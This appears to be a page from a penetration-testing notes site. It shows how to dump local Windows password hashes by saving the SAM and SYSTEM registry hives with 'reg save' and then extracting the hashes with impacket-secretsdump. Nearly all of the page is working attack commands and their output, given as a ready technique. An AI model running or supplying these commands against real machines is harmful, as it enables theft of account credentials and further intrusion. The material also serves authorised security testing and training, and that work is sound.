Registry

We can also obtain a copy of the SAM and SYSTEM files from the registry in the HKLM\sam and HKLM\system hives

C:\>reg save HKLM\SAM C:\users\khan.chanthou\SAM
The operation completed successfully.

C:\>reg save HKLM\SYSTEM C:\users\khan.chanthou\SYSTEM
The operation completed successfully.

Dumping the hash

impacket-secretsdump -sam sam -system system local

PreviousMeterpreter Kiwi NextShadow Copy

Last updated 1 year ago